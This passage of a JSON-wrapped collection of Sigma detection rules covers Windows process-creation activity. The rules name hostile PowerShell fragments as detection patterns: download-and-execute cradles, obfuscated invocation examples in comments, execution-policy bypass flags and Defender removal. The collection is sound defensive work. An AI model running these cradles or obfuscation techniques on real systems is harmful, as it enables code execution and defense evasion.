    "content": "title: Stop Windows Service Via PowerShell Stop-Service\nid: c49c5062-0966-4170-9efd-9968c913a6cf\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc_net_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cli:\n        CommandLine|contains: 'Stop-Service '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml",
    "content": "title: Suspicious PowerShell Download and Execute Pattern\nid: e6c54d94-498c-4562-a37c-b469d8e9a275\nrelated:\n    - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)\nreferences:\n    - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-28\nmodified: 2022-03-01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: # make sure that your backend applies the strings case-insensitive\n            - 'IEX ((New-Object Net.WebClient).DownloadString'\n            - 'IEX (New-Object Net.WebClient).DownloadString'\n            - 'IEX((New-Object Net.WebClient).DownloadString'\n            - 'IEX(New-Object Net.WebClient).DownloadString'\n            - ' -command (New-Object System.Net.WebClient).DownloadFile('\n            - ' -c (New-Object System.Net.WebClient).DownloadFile('\n    condition: selection\nfalsepositives:\n    - Software installers that pull packages from remote systems and execute them\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml",
    "content": "title: Suspicious PowerShell Parameter Substring\nid: 36210e0d-5b19-485d-a087-c096088885f0\nstatus: test\ndescription: Detects suspicious PowerShell invocation with a parameter substring\nreferences:\n    - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier\nauthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)\ndate: 2019-01-16\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -windowstyle h '\n            - ' -windowstyl h'\n            - ' -windowsty h'\n            - ' -windowst h'\n            - ' -windows h'\n            - ' -windo h'\n            - ' -wind h'\n            - ' -win h'\n            - ' -wi h'\n            - ' -win h '\n            - ' -win hi '\n            - ' -win hid '\n            - ' -win hidd '\n            - ' -win hidde '\n            - ' -NoPr '\n            - ' -NoPro '\n            - ' -NoProf '\n            - ' -NoProfi '\n            - ' -NoProfil '\n            - ' -nonin '\n            - ' -nonint '\n            - ' -noninte '\n            - ' -noninter '\n            - ' -nonintera '\n            - ' -noninterac '\n            - ' -noninteract '\n            - ' -noninteracti '\n            - ' -noninteractiv '\n            - ' -ec '\n            - ' -encodedComman '\n            - ' -encodedComma '\n            - ' -encodedComm '\n            - ' -encodedCom '\n            - ' -encodedCo '\n            - ' -encodedC '\n            - ' -encoded '\n            - ' -encode '\n            - ' -encod '\n            - ' -enco '\n            - ' -en '\n            - ' -executionpolic '\n            - ' -executionpoli '\n            - ' -executionpol '\n            - ' -executionpo '\n            - ' -executionp '\n            - ' -execution bypass'\n            - ' -executio bypass'\n            - ' -executi bypass'\n            - ' -execut bypass'\n            - ' -execu bypass'\n            - ' -exec bypass'\n            - ' -exe bypass'\n            - ' -ex bypass'\n            - ' -ep bypass'\n            - ' /windowstyle h '\n            - ' /windowstyl h'\n            - ' /windowsty h'\n            - ' /windowst h'\n            - ' /windows h'\n            - ' /windo h'\n            - ' /wind h'\n            - ' /win h'\n            - ' /wi h'\n            - ' /win h '\n            - ' /win hi '\n            - ' /win hid '\n            - ' /win hidd '\n            - ' /win hidde '\n            - ' /NoPr '\n            - ' /NoPro '\n            - ' /NoProf '\n            - ' /NoProfi '\n            - ' /NoProfil '\n            - ' /nonin '\n            - ' /nonint '\n            - ' /noninte '\n            - ' /noninter '\n            - ' /nonintera '\n            - ' /noninterac '\n            - ' /noninteract '\n            - ' /noninteracti '\n            - ' /noninteractiv '\n            - ' /ec '\n            - ' /encodedComman '\n            - ' /encodedComma '\n            - ' /encodedComm '\n            - ' /encodedCom '\n            - ' /encodedCo '\n            - ' /encodedC '\n            - ' /encoded '\n            - ' /encode '\n            - ' /encod '\n            - ' /enco '\n            - ' /en '\n            - ' /executionpolic '\n            - ' /executionpoli '\n            - ' /executionpol '\n            - ' /executionpo '\n            - ' /executionp '\n            - ' /execution bypass'\n            - ' /executio bypass'\n            - ' /executi bypass'\n            - ' /execut bypass'\n            - ' /execu bypass'\n            - ' /exec bypass'\n            - ' /exe bypass'\n            - ' /ex bypass'\n            - ' /ep bypass'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml",
    "content": "title: Suspicious PowerShell Parent Process\nid: 754ed792-634f-40ae-b3bc-e0448d33f695\nrelated:\n    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6\n      type: derived\nstatus: test\ndescription: Detects suspicious or uncommon parent processes of PowerShell\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26\nauthor: Teymur Kheirkhabarov, Harish Segar\ndate: 2020-03-20\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        - ParentImage|contains: 'tomcat'\n        - ParentImage|endswith:\n              - '\\amigo.exe'\n              - '\\browser.exe'\n              - '\\chrome.exe'\n              - '\\firefox.exe'\n              - '\\httpd.exe'\n              - '\\iexplore.exe'\n              - '\\jbosssvc.exe'\n              - '\\microsoftedge.exe'\n              - '\\microsoftedgecp.exe'\n              - '\\MicrosoftEdgeSH.exe'\n              - '\\mshta.exe'\n              - '\\nginx.exe'\n              - '\\outlook.exe'\n              - '\\php-cgi.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\safari.exe'\n              - '\\services.exe'\n              - '\\sqlagent.exe'\n              - '\\sqlserver.exe'\n              - '\\sqlservr.exe'\n              - '\\vivaldi.exe'\n              - '\\w3wp.exe'\n    selection_powershell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - CommandLine|contains:\n              - '/c powershell'  # FPs with sub processes that contained \"powershell\" somewhere in the command line\n              - '/c pwsh'\n        - Description: 'Windows PowerShell'\n        - Product: 'PowerShell Core 6'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Other scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml",
    "content": "title: PowerShell Script Run in AppData\nid: ac175779-025a-4f12-98b0-acdaeb77ea85\nstatus: test\ndescription: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1082851155481288706\n    - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-09\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'powershell.exe'\n            - '\\powershell'\n            - '\\pwsh'\n            - 'pwsh.exe'\n    selection2:\n        CommandLine|contains|all:\n            - '/c '\n            - '\\AppData\\'\n        CommandLine|contains:\n            - 'Local\\'\n            - 'Roaming\\'\n    condition: all of selection*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml",
    "content": "title: Powershell Token Obfuscation - Process Creation\nid: deb9b646-a508-44ee-b7c9-d8965921c6b6\nrelated:\n    - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51\n      type: similar\nstatus: test\ndescription: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation\nauthor: frack113\ndate: 2022-12-27\nmodified: 2024-08-11\ntags:\n    - attack.defense-evasion\n    - attack.t1027.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Examples:\n        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString\n        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString\n        #   &(\"{2}{3}{0}{4}{1}\"-f 'e','Expression','I','nvok','-') (&(\"{0}{1}{2}\"-f'N','ew-O','bject') Net.WebClient).DownloadString\n        - CommandLine|re: '\\w+`(\\w+|-|.)`[\\w+|\\s]'\n        # - CommandLine|re: '\\((\\'(\\w|-|\\.)+\\'\\+)+\\'(\\w|-|\\.)+\\'\\)' TODO: fixme\n        - CommandLine|re: '\"(\\{\\d\\})+\"\\s*-f'\n        #   ${e`Nv:pATh}\n        - CommandLine|re: '(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}'\n    filter_main_envpath:\n        CommandLine|contains: '${env:path}'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_uninstall_defender_feature.yml",
    "content": "title: Suspicious Uninstall of Windows Defender Feature via PowerShell\nid: c443012c-7928-43bf-ac20-7eda5efe61ad\nstatus: experimental\ndescription: |\n    Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.windows.servermanager.migration/uninstall-windowsfeature\n    - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware\nauthor: yxinmiracle\ndate: 2025-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_uninstall:\n        CommandLine|contains:\n            - 'Uninstall-WindowsFeature'\n            - 'Remove-WindowsFeature' # Only supported in Windows Server 2008 R2 and Windows 2012 R2\n    selection_cli_defender_feature:\n        CommandLine|contains: 'Windows-Defender'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml",
    "content": "title: User Discovery And Export Via Get-ADUser Cmdlet\nid: 1114e048-b69c-4f41-bc20-657245ae6e3f\nrelated:\n    - id: c2993223-6da8-4b1a-88ee-668b8bf315e9\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Get-ADUser '\n            - ' -Filter \\*'\n        CommandLine|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate admin scripts may use the same technique; it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml",
    "content": "title: Net WebClient Casing Anomalies\nid: c86133ad-4725-4bd0-8170-210788e0a7ba\nstatus: test\ndescription: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques\nreferences:\n    - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-24\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_encoded:\n        CommandLine|contains:\n            - 'TgBlAFQALgB3AEUAQg'\n            - '4AZQBUAC4AdwBFAEIA'\n            - 'OAGUAVAAuAHcARQBCA'\n            - 'bgBFAHQALgB3AGUAYg'\n            - '4ARQB0AC4AdwBlAGIA'\n            - 'uAEUAdAAuAHcAZQBiA'\n            - 'TgBFAHQALgB3AGUAYg'\n            - 'OAEUAdAAuAHcAZQBiA'\n            - 'bgBlAFQALgB3AGUAYg'\n            - '4AZQBUAC4AdwBlAGIA'\n            - 'uAGUAVAAuAHcAZQBiA'\n            - 'TgBlAFQALgB3AGUAYg'\n            - 'OAGUAVAAuAHcAZQBiA'\n            - 'bgBFAFQALgB3AGUAYg'\n            - '4ARQBUAC4AdwBlAGIA'\n            - 'uAEUAVAAuAHcAZQBiA'\n            - 'bgBlAHQALgBXAGUAYg'\n            - '4AZQB0AC4AVwBlAGIA'\n            - 'uAGUAdAAuAFcAZQBiA'\n            - 'bgBFAHQALgBXAGUAYg'\n            - '4ARQB0AC4AVwBlAGIA'\n            - 'uAEUAdAAuAFcAZQBiA'\n            - 'TgBFAHQALgBXAGUAYg'\n            - 'OAEUAdAAuAFcAZQBiA'\n            - 'bgBlAFQALgBXAGUAYg'\n            - '4AZQBUAC4AVwBlAGIA'\n            - 'uAGUAVAAuAFcAZQBiA'\n            - 'TgBlAFQALgBXAGUAYg'\n            - 'OAGUAVAAuAFcAZQBiA'\n            - 'bgBFAFQALgBXAGUAYg'\n            - '4ARQBUAC4AVwBlAGIA'\n            - 'uAEUAVAAuAFcAZQBiA'\n 
           - 'bgBlAHQALgB3AEUAYg'\n            - '4AZQB0AC4AdwBFAGIA'\n            - 'uAGUAdAAuAHcARQBiA'\n            - 'TgBlAHQALgB3AEUAYg'\n            - 'OAGUAdAAuAHcARQBiA'\n            - 'bgBFAHQALgB3AEUAYg'\n            - '4ARQB0AC4AdwBFAGIA'\n            - 'uAEUAdAAuAHcARQBiA'\n            - 'TgBFAHQALgB3AEUAYg'\n            - 'OAEUAdAAuAHcARQBiA'\n            - 'bgBlAFQALgB3AEUAYg'\n            - '4AZQBUAC4AdwBFAGIA'\n            - 'uAGUAVAAuAHcARQBiA'\n            - 'TgBlAFQALgB3AEUAYg'\n            - 'OAGUAVAAuAHcARQBiA'\n            - 'bgBFAFQALgB3AEUAYg'\n            - '4ARQBUAC4AdwBFAGIA'\n            - 'uAEUAVAAuAHcARQBiA'\n            - 'TgBFAFQALgB3AEUAYg'\n            - 'OAEUAVAAuAHcARQBiA'\n            - 'bgBlAHQALgBXAEUAYg'\n            - '4AZQB0AC4AVwBFAGIA'\n            - 'uAGUAdAAuAFcARQBiA'\n            - 'TgBlAHQALgBXAEUAYg'\n            - 'OAGUAdAAuAFcARQBiA'\n            - 'bgBFAHQALgBXAEUAYg'\n            - '4ARQB0AC4AVwBFAGIA'\n            - 'uAEUAdAAuAFcARQBiA'\n            - 'TgBFAHQALgBXAEUAYg'\n            - 'OAEUAdAAuAFcARQBiA'\n            - 'bgBlAFQALgBXAEUAYg'\n            - '4AZQBUAC4AVwBFAGIA'\n            - 'uAGUAVAAuAFcARQBiA'\n            - 'TgBlAFQALgBXAEUAYg'\n            - 'OAGUAVAAuAFcARQBiA'\n            - 'bgBFAFQALgBXAEUAYg'\n            - '4ARQBUAC4AVwBFAGIA'\n            - 'uAEUAVAAuAFcARQBiA'\n            - 'TgBFAFQALgBXAEUAYg'\n            - 'OAEUAVAAuAFcARQBiA'\n            - 'bgBlAHQALgB3AGUAQg'\n            - '4AZQB0AC4AdwBlAEIA'\n            - 'uAGUAdAAuAHcAZQBCA'\n            - 'TgBlAHQALgB3AGUAQg'\n            - 'OAGUAdAAuAHcAZQBCA'\n            - 'bgBFAHQALgB3AGUAQg'\n            - '4ARQB0AC4AdwBlAEIA'\n            - 'uAEUAdAAuAHcAZQBCA'\n            - 'TgBFAHQALgB3AGUAQg'\n            - 'OAEUAdAAuAHcAZQBCA'\n            - 'bgBlAFQALgB3AGUAQg'\n            - '4AZQBUAC4AdwBlAEIA'\n            - 'uAGUAVAAuAHcAZQBCA'\n            - 'TgBlAFQALgB3AGUAQg'\n            - 'OAGUAVAAuAHcAZQBCA'\n            - 
'bgBFAFQALgB3AGUAQg'\n            - '4ARQBUAC4AdwBlAEIA'\n            - 'uAEUAVAAuAHcAZQBCA'\n            - 'TgBFAFQALgB3AGUAQg'\n            - 'OAEUAVAAuAHcAZQBCA'\n            - 'bgBlAHQALgBXAGUAQg'\n            - '4AZQB0AC4AVwBlAEIA'\n            - 'uAGUAdAAuAFcAZQBCA'\n            - 'TgBlAHQALgBXAGUAQg'\n            - 'OAGUAdAAuAFcAZQBCA'\n            - 'bgBFAHQALgBXAGUAQg'\n            - '4ARQB0AC4AVwBlAEIA'\n            - 'uAEUAdAAuAFcAZQBCA'\n            - 'TgBFAHQALgBXAGUAQg'\n            - 'OAEUAdAAuAFcAZQBCA'\n            - 'bgBlAFQALgBXAGUAQg'\n            - '4AZQBUAC4AVwBlAEIA'\n            - 'uAGUAVAAuAFcAZQBCA'\n            - 'TgBlAFQALgBXAGUAQg'\n            - 'OAGUAVAAuAFcAZQBCA'\n            - 'bgBFAFQALgBXAGUAQg'\n            - '4ARQBUAC4AVwBlAEIA'\n            - 'uAEUAVAAuAFcAZQBCA'\n            - 'TgBFAFQALgBXAGUAQg'\n            - 'OAEUAVAAuAFcAZQBCA'\n            - 'bgBlAHQALgB3AEUAQg'\n            - '4AZQB0AC4AdwBFAEIA'\n            - 'uAGUAdAAuAHcARQBCA'\n            - 'TgBlAHQALgB3AEUAQg'\n            - 'OAGUAdAAuAHcARQBCA'\n            - 'bgBFAHQALgB3AEUAQg'\n            - '4ARQB0AC4AdwBFAEIA'\n            - 'uAEUAdAAuAHcARQBCA'\n            - 'TgBFAHQALgB3AEUAQg'\n            - 'OAEUAdAAuAHcARQBCA'\n            - 'bgBlAFQALgB3AEUAQg'\n            - 'uAGUAVAAuAHcARQBCA'\n            - 'bgBFAFQALgB3AEUAQg'\n            - '4ARQBUAC4AdwBFAEIA'\n            - 'uAEUAVAAuAHcARQBCA'\n            - 'TgBFAFQALgB3AEUAQg'\n            - 'OAEUAVAAuAHcARQBCA'\n            - 'TgBlAHQALgBXAEUAQg'\n            - '4AZQB0AC4AVwBFAEIA'\n            - 'OAGUAdAAuAFcARQBCA'\n            - 'bgBFAHQALgBXAEUAQg'\n            - '4ARQB0AC4AVwBFAEIA'\n            - 'uAEUAdAAuAFcARQBCA'\n            - 'TgBFAHQALgBXAEUAQg'\n            - 'OAEUAdAAuAFcARQBCA'\n            - 'bgBlAFQALgBXAEUAQg'\n            - '4AZQBUAC4AVwBFAEIA'\n            - 'uAGUAVAAuAFcARQBCA'\n            - 'TgBlAFQALgBXAEUAQg'\n            - 'OAGUAVAAuAFcARQBCA'\n            - 
'bgBFAFQALgBXAEUAQg'\n            - '4ARQBUAC4AVwBFAEIA'\n            - 'uAEUAVAAuAFcARQBCA'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml",
    "content": "title: Suspicious X509Enrollment - Process Creation\nid: 114de787-4eb2-48cc-abdb-c0b449f93ea4\nrelated:\n    - id: 504d63cb-0dba-4d02-8531-e72981aace2c\n      type: similar\nstatus: test\ndescription: Detects use of X509Enrollment\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41\n    - https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'X509Enrollment.CBinaryConverter'\n            - '884e2002-217d-11da-b2a4-000e7bbb2b09'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml",
    "content": "title: Suspicious XOR Encoded PowerShell Command\nid: bb780e0c-16cf-4383-8383-1e5471db6cf9\nrelated:\n    - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\n      type: obsolete\nstatus: test\ndescription: Detects the presence of a potentially XOR-encoded PowerShell command\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\n    - https://redcanary.com/blog/yellow-cockatoo/\n    - https://zero2auto.com/2020/05/19/netwalker-re/\n    - https://mez0.cc/posts/cobaltstrike-powershell-exec/\nauthor: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali\ndate: 2018-09-05\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1140\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Description: 'Windows PowerShell'\n        - Product: 'PowerShell Core 6'\n    selection_cli_xor:\n        CommandLine|contains: 'bxor'\n    selection_cli_other:\n        CommandLine|contains:\n            - 'ForEach'\n            - 'for('\n            - 'for '\n            - '-join '\n            - \"-join'\"\n            - '-join\"'\n            - '-join`'\n            - '::Join'\n            - '[char]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml",
    "content": "title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet\nid: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_presentationhost_download.yml",
    "content": "title: Arbitrary File Download Via PresentationHost.EXE\nid: b124ddf4-778d-418e-907f-6dd3fc0d31cd\nstatus: test\ndescription: Detects usage of \"PresentationHost\", a utility that runs \".xbap\" (Browser Applications) files, to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\presentationhost.exe'\n        - OriginalFileName: 'PresentationHost.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - 'ftp://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml",
    "content": "title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE\nid: d22e2925-cfd8-463f-96f6-89cec9d9bc5f\nstatus: test\ndescription: |\n    Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious \".xbap\" files and bypass AWL\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-01\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\presentationhost.exe'\n        - OriginalFileName: 'PresentationHost.exe'\n    selection_cli:\n        CommandLine|contains: '.xbap'\n    filter_main_generic:\n        CommandLine|contains: # Filter out legitimate locations if you find them\n            - ' C:\\Windows\\'\n            - ' C:\\Program Files'\n    condition: all of selection* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate \".xbap\" being executed via \"PresentationHost\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml",
    "content": "title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution\nid: a20391f8-76fb-437b-abc0-dba2df1952c6\nrelated:\n    - id: 65c3ca2c-525f-4ced-968e-246a713d164f\n      type: similar\nstatus: test\ndescription: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary\nreferences:\n    - https://twitter.com/mrd0x/status/1463526834918854661\n    - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-04-11\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Microsoft.NodejsTools.PressAnyKey.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by developers as part of NodeJS development with Visual Studio Tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml",
    "content": "title: Abusing Print Executable\nid: bafac3d6-7de9-4dd9-8874-4a1194b493ed\nstatus: test\ndescription: Attackers can use print.exe for remote file copy\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Print/\n    - https://twitter.com/Oddvarmoe/status/985518877076541440\nauthor: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative'\ndate: 2020-10-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\print.exe'\n        CommandLine|startswith: 'print'\n        CommandLine|contains|all:\n            - '/D'\n            - '.exe'\n    filter_print:\n        CommandLine|contains: 'print.exe'\n    condition: selection and not filter_print\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml",
